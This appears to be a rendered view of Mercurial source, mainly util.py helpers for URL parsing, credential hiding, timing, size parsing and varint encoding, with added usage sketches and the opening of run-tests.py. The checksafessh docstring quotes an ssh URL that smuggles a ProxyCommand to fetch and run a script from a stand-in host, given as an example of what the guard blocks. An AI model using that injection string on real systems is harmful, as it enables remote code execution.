3231 s = bytes(self)
3231 s = bytes(self)
3232 finally:
3232 finally:
3233 self.user, self.passwd = user, passwd
3233 self.user, self.passwd = user, passwd
3234 if not self.user:
3234 if not self.user:
3235 return (s, None)
3235 return (s, None)
3236 # authinfo[1] is passed to urllib2 password manager, and its
3236 # authinfo[1] is passed to urllib2 password manager, and its
3237 # URIs must not contain credentials. The host is passed in the
3237 # URIs must not contain credentials. The host is passed in the
3238 # URIs list because Python < 2.4.3 uses only that to search for
3238 # URIs list because Python < 2.4.3 uses only that to search for
3239 # a password.
3239 # a password.
3240 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3240 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3241
3241
3242 def isabs(self):
3242 def isabs(self):
3243 if self.scheme and self.scheme != b'file':
3243 if self.scheme and self.scheme != b'file':
3244 return True # remote URL
3244 return True # remote URL
3245 if hasdriveletter(self.path):
3245 if hasdriveletter(self.path):
3246 return True # absolute for our purposes - can't be joined()
3246 return True # absolute for our purposes - can't be joined()
3247 if self.path.startswith(br'\\'):
3247 if self.path.startswith(br'\\'):
3248 return True # Windows UNC path
3248 return True # Windows UNC path
3249 if self.path.startswith(b'/'):
3249 if self.path.startswith(b'/'):
3250 return True # POSIX-style
3250 return True # POSIX-style
3251 return False
3251 return False
3252
3252
3253 def localpath(self):
3253 def localpath(self):
3254 if self.scheme == b'file' or self.scheme == b'bundle':
3254 if self.scheme == b'file' or self.scheme == b'bundle':
3255 path = self.path or b'/'
3255 path = self.path or b'/'
3256 # For Windows, we need to promote hosts containing drive
3256 # For Windows, we need to promote hosts containing drive
3257 # letters to paths with drive letters.
3257 # letters to paths with drive letters.
3258 if hasdriveletter(self._hostport):
3258 if hasdriveletter(self._hostport):
3259 path = self._hostport + b'/' + self.path
3259 path = self._hostport + b'/' + self.path
3260 elif (
3260 elif (
3261 self.host is not None and self.path and not hasdriveletter(path)
3261 self.host is not None and self.path and not hasdriveletter(path)
3262 ):
3262 ):
3263 path = b'/' + path
3263 path = b'/' + path
3264 return path
3264 return path
3265 return self._origpath
3265 return self._origpath
3266
3266
3267 def islocal(self):
3267 def islocal(self):
3268 '''whether localpath will return something that posixfile can open'''
3268 '''whether localpath will return something that posixfile can open'''
3269 return (
3269 return (
3270 not self.scheme
3270 not self.scheme
3271 or self.scheme == b'file'
3271 or self.scheme == b'file'
3272 or self.scheme == b'bundle'
3272 or self.scheme == b'bundle'
3273 )
3273 )
3274
3274
3275
3275
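To make the parsing and re-serialization rules above concrete, here is an editor's sketch (illustrative only, using the class exactly as defined in this file; the example URL is made up):

u = url(b'https://alice:secret@example.com:8443/repo?style=raw#tip')
# Components are split out as documented in the class docstring:
#   u.scheme == b'https', u.user == b'alice', u.passwd == b'secret',
#   u.host == b'example.com', u.port == b'8443', u.path == b'repo',
#   u.query == b'style=raw', u.fragment == b'tip'
# __bytes__ re-quotes user/host/path but leaves the query escaped, so the
# round trip reproduces the input:
assert bytes(u) == b'https://alice:secret@example.com:8443/repo?style=raw#tip'
# authinfo() strips the credentials from the URI handed to the password
# manager while keeping them available separately:
uri, auth = u.authinfo()
assert uri == b'https://example.com:8443/repo?style=raw#tip'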
3276 def hasscheme(path):
3276 def hasscheme(path):
3277 return bool(url(path).scheme)
3277 return bool(url(path).scheme)
3278
3278
3279
3279
3280 def hasdriveletter(path):
3280 def hasdriveletter(path):
3281 return path and path[1:2] == b':' and path[0:1].isalpha()
3281 return path and path[1:2] == b':' and path[0:1].isalpha()
3282
3282
3283
3283
3284 def urllocalpath(path):
3284 def urllocalpath(path):
3285 return url(path, parsequery=False, parsefragment=False).localpath()
3285 return url(path, parsequery=False, parsefragment=False).localpath()
3286
3286
3287
3287
3288 def checksafessh(path):
3288 def checksafessh(path):
3289 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3289 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3290
3290
3291 This is a sanity check for ssh urls. ssh will parse the first item as
3291 This is a sanity check for ssh urls. ssh will parse the first item as
3292 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3292 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3293 Let's prevent these potentially exploitable urls entirely and warn the
3293 Let's prevent these potentially exploitable urls entirely and warn the
3294 user.
3294 user.
3295
3295
3296 Raises an error.Abort when the url is unsafe.
3296 Raises an error.Abort when the url is unsafe.
3297 """
3297 """
3298 path = urlreq.unquote(path)
3298 path = urlreq.unquote(path)
3299 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3299 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3300 raise error.Abort(
3300 raise error.Abort(
3301 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3301 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3302 )
3302 )
3303
3303
3304
3304
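An editor's sketch of the guard above in action (illustrative only):

# A normal ssh URL passes through silently.
checksafessh(b'ssh://user@host/repo')
# A URL whose "host" would be parsed by ssh as an option is rejected
# before any ssh command line is built.
try:
    checksafessh(b'ssh://-oProxyCommand=curl${IFS}bad.server|sh/path')
except error.Abort:
    pass  # expected: "potentially unsafe url: ..."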
3305 def hidepassword(u):
3305 def hidepassword(u):
3306 '''hide user credential in a url string'''
3306 '''hide user credential in a url string'''
3307 u = url(u)
3307 u = url(u)
3308 if u.passwd:
3308 if u.passwd:
3309 u.passwd = b'***'
3309 u.passwd = b'***'
3310 return bytes(u)
3310 return bytes(u)
3311
3311
3312
3312
3313 def removeauth(u):
3313 def removeauth(u):
3314 '''remove all authentication information from a url string'''
3314 '''remove all authentication information from a url string'''
3315 u = url(u)
3315 u = url(u)
3316 u.user = u.passwd = None
3316 u.user = u.passwd = None
3317 return bytes(u)
3317 return bytes(u)
3318
3318
3319
3319
3320 timecount = unitcountfn(
3320 timecount = unitcountfn(
3321 (1, 1e3, _(b'%.0f s')),
3321 (1, 1e3, _(b'%.0f s')),
3322 (100, 1, _(b'%.1f s')),
3322 (100, 1, _(b'%.1f s')),
3323 (10, 1, _(b'%.2f s')),
3323 (10, 1, _(b'%.2f s')),
3324 (1, 1, _(b'%.3f s')),
3324 (1, 1, _(b'%.3f s')),
3325 (100, 0.001, _(b'%.1f ms')),
3325 (100, 0.001, _(b'%.1f ms')),
3326 (10, 0.001, _(b'%.2f ms')),
3326 (10, 0.001, _(b'%.2f ms')),
3327 (1, 0.001, _(b'%.3f ms')),
3327 (1, 0.001, _(b'%.3f ms')),
3328 (100, 0.000001, _(b'%.1f us')),
3328 (100, 0.000001, _(b'%.1f us')),
3329 (10, 0.000001, _(b'%.2f us')),
3329 (10, 0.000001, _(b'%.2f us')),
3330 (1, 0.000001, _(b'%.3f us')),
3330 (1, 0.000001, _(b'%.3f us')),
3331 (100, 0.000000001, _(b'%.1f ns')),
3331 (100, 0.000000001, _(b'%.1f ns')),
3332 (10, 0.000000001, _(b'%.2f ns')),
3332 (10, 0.000000001, _(b'%.2f ns')),
3333 (1, 0.000000001, _(b'%.3f ns')),
3333 (1, 0.000000001, _(b'%.3f ns')),
3334 )
3334 )
3335
3335
3336
3336
3337 @attr.s
3337 @attr.s
3338 class timedcmstats(object):
3338 class timedcmstats(object):
3339 """Stats information produced by the timedcm context manager on entering."""
3339 """Stats information produced by the timedcm context manager on entering."""
3340
3340
3341 # the starting value of the timer as a float (meaning and resolution are
3341 # the starting value of the timer as a float (meaning and resolution are
3342 # platform dependent, see util.timer)
3342 # platform dependent, see util.timer)
3343 start = attr.ib(default=attr.Factory(lambda: timer()))
3343 start = attr.ib(default=attr.Factory(lambda: timer()))
3344 # the number of seconds as a floating point value; starts at 0, updated when
3344 # the number of seconds as a floating point value; starts at 0, updated when
3345 # the context is exited.
3345 # the context is exited.
3346 elapsed = attr.ib(default=0)
3346 elapsed = attr.ib(default=0)
3347 # the number of nested timedcm context managers.
3347 # the number of nested timedcm context managers.
3348 level = attr.ib(default=1)
3348 level = attr.ib(default=1)
3349
3349
3350 def __bytes__(self):
3350 def __bytes__(self):
3351 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3351 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3352
3352
3353 __str__ = encoding.strmethod(__bytes__)
3353 __str__ = encoding.strmethod(__bytes__)
3354
3354
3355
3355
3356 @contextlib.contextmanager
3356 @contextlib.contextmanager
3357 def timedcm(whencefmt, *whenceargs):
3357 def timedcm(whencefmt, *whenceargs):
3358 """A context manager that produces timing information for a given context.
3358 """A context manager that produces timing information for a given context.
3359
3359
3360 On entering, a timedcmstats instance is produced.
3360 On entering, a timedcmstats instance is produced.
3361
3361
3362 This context manager is reentrant.
3362 This context manager is reentrant.
3363
3363
3364 """
3364 """
3365 # track nested context managers
3365 # track nested context managers
3366 timedcm._nested += 1
3366 timedcm._nested += 1
3367 timing_stats = timedcmstats(level=timedcm._nested)
3367 timing_stats = timedcmstats(level=timedcm._nested)
3368 try:
3368 try:
3369 with tracing.log(whencefmt, *whenceargs):
3369 with tracing.log(whencefmt, *whenceargs):
3370 yield timing_stats
3370 yield timing_stats
3371 finally:
3371 finally:
3372 timing_stats.elapsed = timer() - timing_stats.start
3372 timing_stats.elapsed = timer() - timing_stats.start
3373 timedcm._nested -= 1
3373 timedcm._nested -= 1
3374
3374
3375
3375
3376 timedcm._nested = 0
3376 timedcm._nested = 0
3377
3377
3378
3378
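A minimal usage sketch of the context manager above (the workload function is hypothetical):

with timedcm(b'rebuilding %s', b'index') as stats:
    rebuild_index()  # hypothetical expensive operation being measured
# After the block exits, stats.elapsed holds the elapsed seconds and
# bytes(stats) formats it via timecount(), e.g. b'12.3 ms'.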
3379 def timed(func):
3379 def timed(func):
3380 '''Report the execution time of a function call to stderr.
3380 '''Report the execution time of a function call to stderr.
3381
3381
3382 During development, use as a decorator when you need to measure
3382 During development, use as a decorator when you need to measure
3383 the cost of a function, e.g. as follows:
3383 the cost of a function, e.g. as follows:
3384
3384
3385 @util.timed
3385 @util.timed
3386 def foo(a, b, c):
3386 def foo(a, b, c):
3387 pass
3387 pass
3388 '''
3388 '''
3389
3389
3390 def wrapper(*args, **kwargs):
3390 def wrapper(*args, **kwargs):
3391 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3391 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3392 result = func(*args, **kwargs)
3392 result = func(*args, **kwargs)
3393 stderr = procutil.stderr
3393 stderr = procutil.stderr
3394 stderr.write(
3394 stderr.write(
3395 b'%s%s: %s\n'
3395 b'%s%s: %s\n'
3396 % (
3396 % (
3397 b' ' * time_stats.level * 2,
3397 b' ' * time_stats.level * 2,
3398 pycompat.bytestr(func.__name__),
3398 pycompat.bytestr(func.__name__),
3399 time_stats,
3399 time_stats,
3400 )
3400 )
3401 )
3401 )
3402 return result
3402 return result
3403
3403
3404 return wrapper
3404 return wrapper
3405
3405
3406
3406
3407 _sizeunits = (
3407 _sizeunits = (
3408 (b'm', 2 ** 20),
3408 (b'm', 2 ** 20),
3409 (b'k', 2 ** 10),
3409 (b'k', 2 ** 10),
3410 (b'g', 2 ** 30),
3410 (b'g', 2 ** 30),
3411 (b'kb', 2 ** 10),
3411 (b'kb', 2 ** 10),
3412 (b'mb', 2 ** 20),
3412 (b'mb', 2 ** 20),
3413 (b'gb', 2 ** 30),
3413 (b'gb', 2 ** 30),
3414 (b'b', 1),
3414 (b'b', 1),
3415 )
3415 )
3416
3416
3417
3417
3418 def sizetoint(s):
3418 def sizetoint(s):
3419 '''Convert a space specifier to a byte count.
3419 '''Convert a space specifier to a byte count.
3420
3420
3421 >>> sizetoint(b'30')
3421 >>> sizetoint(b'30')
3422 30
3422 30
3423 >>> sizetoint(b'2.2kb')
3423 >>> sizetoint(b'2.2kb')
3424 2252
3424 2252
3425 >>> sizetoint(b'6M')
3425 >>> sizetoint(b'6M')
3426 6291456
3426 6291456
3427 '''
3427 '''
3428 t = s.strip().lower()
3428 t = s.strip().lower()
3429 try:
3429 try:
3430 for k, u in _sizeunits:
3430 for k, u in _sizeunits:
3431 if t.endswith(k):
3431 if t.endswith(k):
3432 return int(float(t[: -len(k)]) * u)
3432 return int(float(t[: -len(k)]) * u)
3433 return int(t)
3433 return int(t)
3434 except ValueError:
3434 except ValueError:
3435 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3435 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3436
3436
3437
3437
3438 class hooks(object):
3438 class hooks(object):
3439 '''A collection of hook functions that can be used to extend a
3439 '''A collection of hook functions that can be used to extend a
3440 function's behavior. Hooks are called in lexicographic order,
3440 function's behavior. Hooks are called in lexicographic order,
3441 based on the names of their sources.'''
3441 based on the names of their sources.'''
3442
3442
3443 def __init__(self):
3443 def __init__(self):
3444 self._hooks = []
3444 self._hooks = []
3445
3445
3446 def add(self, source, hook):
3446 def add(self, source, hook):
3447 self._hooks.append((source, hook))
3447 self._hooks.append((source, hook))
3448
3448
3449 def __call__(self, *args):
3449 def __call__(self, *args):
3450 self._hooks.sort(key=lambda x: x[0])
3450 self._hooks.sort(key=lambda x: x[0])
3451 results = []
3451 results = []
3452 for source, hook in self._hooks:
3452 for source, hook in self._hooks:
3453 results.append(hook(*args))
3453 results.append(hook(*args))
3454 return results
3454 return results
3455
3455
3456
3456
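An editor's sketch of the container above; the source names and hook bodies are made up:

h = hooks()
h.add(b'zebra-ext', lambda x: x * 2)
h.add(b'alpha-ext', lambda x: x + 1)
# Hooks run sorted by source name, so the b'alpha-ext' hook fires first:
assert h(10) == [11, 20]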
3457 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3457 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3458 '''Yields lines for a nicely formatted stacktrace.
3458 '''Yields lines for a nicely formatted stacktrace.
3459 Skips the last 'skip' entries, then returns the last 'depth' entries.
3459 Skips the last 'skip' entries, then returns the last 'depth' entries.
3460 Each file+linenumber is formatted according to fileline.
3460 Each file+linenumber is formatted according to fileline.
3461 Each line is formatted according to line.
3461 Each line is formatted according to line.
3462 If line is None, it yields:
3462 If line is None, it yields:
3463 length of longest filepath+line number,
3463 length of longest filepath+line number,
3464 filepath+linenumber,
3464 filepath+linenumber,
3465 function
3465 function
3466
3466
3467 Not to be used in production code, but very convenient while developing.
3467 Not to be used in production code, but very convenient while developing.
3468 '''
3468 '''
3469 entries = [
3469 entries = [
3470 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3470 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3471 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3471 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3472 ][-depth:]
3472 ][-depth:]
3473 if entries:
3473 if entries:
3474 fnmax = max(len(entry[0]) for entry in entries)
3474 fnmax = max(len(entry[0]) for entry in entries)
3475 for fnln, func in entries:
3475 for fnln, func in entries:
3476 if line is None:
3476 if line is None:
3477 yield (fnmax, fnln, func)
3477 yield (fnmax, fnln, func)
3478 else:
3478 else:
3479 yield line % (fnmax, fnln, func)
3479 yield line % (fnmax, fnln, func)
3480
3480
3481
3481
3482 def debugstacktrace(
3482 def debugstacktrace(
3483 msg=b'stacktrace',
3483 msg=b'stacktrace',
3484 skip=0,
3484 skip=0,
3485 f=procutil.stderr,
3485 f=procutil.stderr,
3486 otherf=procutil.stdout,
3486 otherf=procutil.stdout,
3487 depth=0,
3487 depth=0,
3488 prefix=b'',
3488 prefix=b'',
3489 ):
3489 ):
3490 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3490 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3491 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3491 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3492 By default it will flush stdout first.
3492 By default it will flush stdout first.
3493 It can be used everywhere and intentionally does not require an ui object.
3493 It can be used everywhere and intentionally does not require an ui object.
3494 Not to be used in production code, but very convenient while developing.
3494 Not to be used in production code, but very convenient while developing.
3495 '''
3495 '''
3496 if otherf:
3496 if otherf:
3497 otherf.flush()
3497 otherf.flush()
3498 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3498 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3499 for line in getstackframes(skip + 1, depth=depth):
3499 for line in getstackframes(skip + 1, depth=depth):
3500 f.write(prefix + line)
3500 f.write(prefix + line)
3501 f.flush()
3501 f.flush()
3502
3502
3503
3503
3504 # convenient shortcut
3504 # convenient shortcut
3505 dst = debugstacktrace
3505 dst = debugstacktrace
3506
3506
3507
3507
3508 def safename(f, tag, ctx, others=None):
3508 def safename(f, tag, ctx, others=None):
3509 """
3509 """
3510 Generate a name that it is safe to rename f to in the given context.
3510 Generate a name that it is safe to rename f to in the given context.
3511
3511
3512 f: filename to rename
3512 f: filename to rename
3513 tag: a string tag that will be included in the new name
3513 tag: a string tag that will be included in the new name
3514 ctx: a context, in which the new name must not exist
3514 ctx: a context, in which the new name must not exist
3515 others: a set of other filenames that the new name must not be in
3515 others: a set of other filenames that the new name must not be in
3516
3516
3517 Returns a file name of the form oldname~tag[~number] which does not exist
3517 Returns a file name of the form oldname~tag[~number] which does not exist
3518 in the provided context and is not in the set of other names.
3518 in the provided context and is not in the set of other names.
3519 """
3519 """
3520 if others is None:
3520 if others is None:
3521 others = set()
3521 others = set()
3522
3522
3523 fn = b'%s~%s' % (f, tag)
3523 fn = b'%s~%s' % (f, tag)
3524 if fn not in ctx and fn not in others:
3524 if fn not in ctx and fn not in others:
3525 return fn
3525 return fn
3526 for n in itertools.count(1):
3526 for n in itertools.count(1):
3527 fn = b'%s~%s~%s' % (f, tag, n)
3527 fn = b'%s~%s~%s' % (f, tag, n)
3528 if fn not in ctx and fn not in others:
3528 if fn not in ctx and fn not in others:
3529 return fn
3529 return fn
3530
3530
3531
3531
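A small hypothetical example of the naming scheme above; a plain set stands in for the changectx, since only `in` membership is used here:

taken = {b'file.txt~orig', b'file.txt~orig~1'}
name = safename(b'file.txt', b'orig', taken, others={b'file.txt~orig~2'})
# The un-numbered and ~1/~2 candidates are all occupied, so:
assert name == b'file.txt~orig~3'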
3532 def readexactly(stream, n):
3532 def readexactly(stream, n):
3533 '''read n bytes from stream.read and abort if less was available'''
3533 '''read n bytes from stream.read and abort if less was available'''
3534 s = stream.read(n)
3534 s = stream.read(n)
3535 if len(s) < n:
3535 if len(s) < n:
3536 raise error.Abort(
3536 raise error.Abort(
3537 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3537 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3538 % (len(s), n)
3538 % (len(s), n)
3539 )
3539 )
3540 return s
3540 return s
3541
3541
3542
3542
3543 def uvarintencode(value):
3543 def uvarintencode(value):
3544 """Encode an unsigned integer value to a varint.
3544 """Encode an unsigned integer value to a varint.
3545
3545
3546 A varint is a variable length integer of 1 or more bytes. Each byte
3546 A varint is a variable length integer of 1 or more bytes. Each byte
3547 except the last has the most significant bit set. The lower 7 bits of
3547 except the last has the most significant bit set. The lower 7 bits of
3548 each byte store the 2's complement representation, least significant group
3548 each byte store the 2's complement representation, least significant group
3549 first.
3549 first.
3550
3550
3551 >>> uvarintencode(0)
3551 >>> uvarintencode(0)
3552 '\\x00'
3552 '\\x00'
3553 >>> uvarintencode(1)
3553 >>> uvarintencode(1)
3554 '\\x01'
3554 '\\x01'
3555 >>> uvarintencode(127)
3555 >>> uvarintencode(127)
3556 '\\x7f'
3556 '\\x7f'
3557 >>> uvarintencode(1337)
3557 >>> uvarintencode(1337)
3558 '\\xb9\\n'
3558 '\\xb9\\n'
3559 >>> uvarintencode(65536)
3559 >>> uvarintencode(65536)
3560 '\\x80\\x80\\x04'
3560 '\\x80\\x80\\x04'
3561 >>> uvarintencode(-1)
3561 >>> uvarintencode(-1)
3562 Traceback (most recent call last):
3562 Traceback (most recent call last):
3563 ...
3563 ...
3564 ProgrammingError: negative value for uvarint: -1
3564 ProgrammingError: negative value for uvarint: -1
3565 """
3565 """
3566 if value < 0:
3566 if value < 0:
3567 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3567 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3568 bits = value & 0x7F
3568 bits = value & 0x7F
3569 value >>= 7
3569 value >>= 7
3570 bytes = []
3570 bytes = []
3571 while value:
3571 while value:
3572 bytes.append(pycompat.bytechr(0x80 | bits))
3572 bytes.append(pycompat.bytechr(0x80 | bits))
3573 bits = value & 0x7F
3573 bits = value & 0x7F
3574 value >>= 7
3574 value >>= 7
3575 bytes.append(pycompat.bytechr(bits))
3575 bytes.append(pycompat.bytechr(bits))
3576
3576
3577 return b''.join(bytes)
3577 return b''.join(bytes)
3578
3578
3579
3579
3580 def uvarintdecodestream(fh):
3580 def uvarintdecodestream(fh):
3581 """Decode an unsigned variable length integer from a stream.
3581 """Decode an unsigned variable length integer from a stream.
3582
3582
3583 The passed argument is anything that has a ``.read(N)`` method.
3583 The passed argument is anything that has a ``.read(N)`` method.
3584
3584
3585 >>> try:
3585 >>> try:
3586 ... from StringIO import StringIO as BytesIO
3586 ... from StringIO import StringIO as BytesIO
3587 ... except ImportError:
3587 ... except ImportError:
3588 ... from io import BytesIO
3588 ... from io import BytesIO
3589 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3589 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3590 0
3590 0
3591 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3591 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3592 1
3592 1
3593 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3593 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3594 127
3594 127
3595 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3595 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3596 1337
3596 1337
3597 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3597 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3598 65536
3598 65536
3599 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3599 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3600 Traceback (most recent call last):
3600 Traceback (most recent call last):
3601 ...
3601 ...
3602 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3602 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3603 """
3603 """
3604 result = 0
3604 result = 0
3605 shift = 0
3605 shift = 0
3606 while True:
3606 while True:
3607 byte = ord(readexactly(fh, 1))
3607 byte = ord(readexactly(fh, 1))
3608 result |= (byte & 0x7F) << shift
3608 result |= (byte & 0x7F) << shift
3609 if not (byte & 0x80):
3609 if not (byte & 0x80):
3610 return result
3610 return result
3611 shift += 7
3611 shift += 7
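A worked example of the layout described above, matching the doctests: 1337 is 0b10100111001, so the low seven bits (0111001 = 0x39) are emitted first with the continuation bit set (0xb9), and the remaining bits (1010 = 0x0a) form the final byte. Editor's sketch:

import io

assert uvarintencode(1337) == b'\xb9\n'                    # 0x0a renders as '\n'
assert uvarintdecodestream(io.BytesIO(b'\xb9\n')) == 1337  # round trip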
@@ -1,3747 +1,3745 b''
1 #!/usr/bin/env python
1 #!/usr/bin/env python
2 #
2 #
3 # run-tests.py - Run a set of tests on Mercurial
3 # run-tests.py - Run a set of tests on Mercurial
4 #
4 #
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 # Modifying this script is tricky because it has many modes:
10 # Modifying this script is tricky because it has many modes:
11 # - serial (default) vs parallel (-jN, N > 1)
11 # - serial (default) vs parallel (-jN, N > 1)
12 # - no coverage (default) vs coverage (-c, -C, -s)
12 # - no coverage (default) vs coverage (-c, -C, -s)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
14 # - tests are a mix of shell scripts and Python scripts
14 # - tests are a mix of shell scripts and Python scripts
15 #
15 #
16 # If you change this script, it is recommended that you ensure you
16 # If you change this script, it is recommended that you ensure you
17 # haven't broken it by running it in various modes with a representative
17 # haven't broken it by running it in various modes with a representative
18 # sample of test scripts. For example:
18 # sample of test scripts. For example:
19 #
19 #
20 # 1) serial, no coverage, temp install:
20 # 1) serial, no coverage, temp install:
21 # ./run-tests.py test-s*
21 # ./run-tests.py test-s*
22 # 2) serial, no coverage, local hg:
22 # 2) serial, no coverage, local hg:
23 # ./run-tests.py --local test-s*
23 # ./run-tests.py --local test-s*
24 # 3) serial, coverage, temp install:
24 # 3) serial, coverage, temp install:
25 # ./run-tests.py -c test-s*
25 # ./run-tests.py -c test-s*
26 # 4) serial, coverage, local hg:
26 # 4) serial, coverage, local hg:
27 # ./run-tests.py -c --local test-s* # unsupported
27 # ./run-tests.py -c --local test-s* # unsupported
28 # 5) parallel, no coverage, temp install:
28 # 5) parallel, no coverage, temp install:
29 # ./run-tests.py -j2 test-s*
29 # ./run-tests.py -j2 test-s*
30 # 6) parallel, no coverage, local hg:
30 # 6) parallel, no coverage, local hg:
31 # ./run-tests.py -j2 --local test-s*
31 # ./run-tests.py -j2 --local test-s*
32 # 7) parallel, coverage, temp install:
32 # 7) parallel, coverage, temp install:
33 # ./run-tests.py -j2 -c test-s* # currently broken
33 # ./run-tests.py -j2 -c test-s* # currently broken
34 # 8) parallel, coverage, local install:
34 # 8) parallel, coverage, local install:
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
36 # 9) parallel, custom tmp dir:
36 # 9) parallel, custom tmp dir:
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
38 # 10) parallel, pure, tests that call run-tests:
38 # 10) parallel, pure, tests that call run-tests:
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
40 #
40 #
41 # (You could use any subset of the tests: test-s* happens to match
41 # (You could use any subset of the tests: test-s* happens to match
42 # enough that it's worth doing parallel runs, few enough that it
42 # enough that it's worth doing parallel runs, few enough that it
43 # completes fairly quickly, includes both shell and Python scripts, and
43 # completes fairly quickly, includes both shell and Python scripts, and
44 # includes some scripts that run daemon processes.)
44 # includes some scripts that run daemon processes.)
45
45
46 from __future__ import absolute_import, print_function
46 from __future__ import absolute_import, print_function
47
47
48 import argparse
48 import argparse
49 import collections
49 import collections
50 import difflib
50 import difflib
51 import distutils.version as version
51 import distutils.version as version
52 import errno
52 import errno
53 import json
53 import json
54 import multiprocessing
54 import multiprocessing
55 import os
55 import os
56 import random
56 import random
57 import re
57 import re
58 import shutil
58 import shutil
59 import signal
59 import signal
60 import socket
60 import socket
61 import subprocess
61 import subprocess
62 import sys
62 import sys
63 import sysconfig
63 import sysconfig
64 import tempfile
64 import tempfile
65 import threading
65 import threading
66 import time
66 import time
67 import unittest
67 import unittest
68 import uuid
68 import uuid
69 import xml.dom.minidom as minidom
69 import xml.dom.minidom as minidom
70
70
71 try:
71 try:
72 import Queue as queue
72 import Queue as queue
73 except ImportError:
73 except ImportError:
74 import queue
74 import queue
75
75
76 try:
76 try:
77 import shlex
77 import shlex
78
78
79 shellquote = shlex.quote
79 shellquote = shlex.quote
80 except (ImportError, AttributeError):
80 except (ImportError, AttributeError):
81 import pipes
81 import pipes
82
82
83 shellquote = pipes.quote
83 shellquote = pipes.quote
84
84
85 processlock = threading.Lock()
85 processlock = threading.Lock()
86
86
87 pygmentspresent = False
87 pygmentspresent = False
88 # ANSI color is unsupported prior to Windows 10
88 # ANSI color is unsupported prior to Windows 10
89 if os.name != 'nt':
89 if os.name != 'nt':
90 try: # is pygments installed
90 try: # is pygments installed
91 import pygments
91 import pygments
92 import pygments.lexers as lexers
92 import pygments.lexers as lexers
93 import pygments.lexer as lexer
93 import pygments.lexer as lexer
94 import pygments.formatters as formatters
94 import pygments.formatters as formatters
95 import pygments.token as token
95 import pygments.token as token
96 import pygments.style as style
96 import pygments.style as style
97
97
98 pygmentspresent = True
98 pygmentspresent = True
99 difflexer = lexers.DiffLexer()
99 difflexer = lexers.DiffLexer()
100 terminal256formatter = formatters.Terminal256Formatter()
100 terminal256formatter = formatters.Terminal256Formatter()
101 except ImportError:
101 except ImportError:
102 pass
102 pass
103
103
104 if pygmentspresent:
104 if pygmentspresent:
105
105
106 class TestRunnerStyle(style.Style):
106 class TestRunnerStyle(style.Style):
107 default_style = ""
107 default_style = ""
108 skipped = token.string_to_tokentype("Token.Generic.Skipped")
108 skipped = token.string_to_tokentype("Token.Generic.Skipped")
109 failed = token.string_to_tokentype("Token.Generic.Failed")
109 failed = token.string_to_tokentype("Token.Generic.Failed")
110 skippedname = token.string_to_tokentype("Token.Generic.SName")
110 skippedname = token.string_to_tokentype("Token.Generic.SName")
111 failedname = token.string_to_tokentype("Token.Generic.FName")
111 failedname = token.string_to_tokentype("Token.Generic.FName")
112 styles = {
112 styles = {
113 skipped: '#e5e5e5',
113 skipped: '#e5e5e5',
114 skippedname: '#00ffff',
114 skippedname: '#00ffff',
115 failed: '#7f0000',
115 failed: '#7f0000',
116 failedname: '#ff0000',
116 failedname: '#ff0000',
117 }
117 }
118
118
119 class TestRunnerLexer(lexer.RegexLexer):
119 class TestRunnerLexer(lexer.RegexLexer):
120 testpattern = r'[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?'
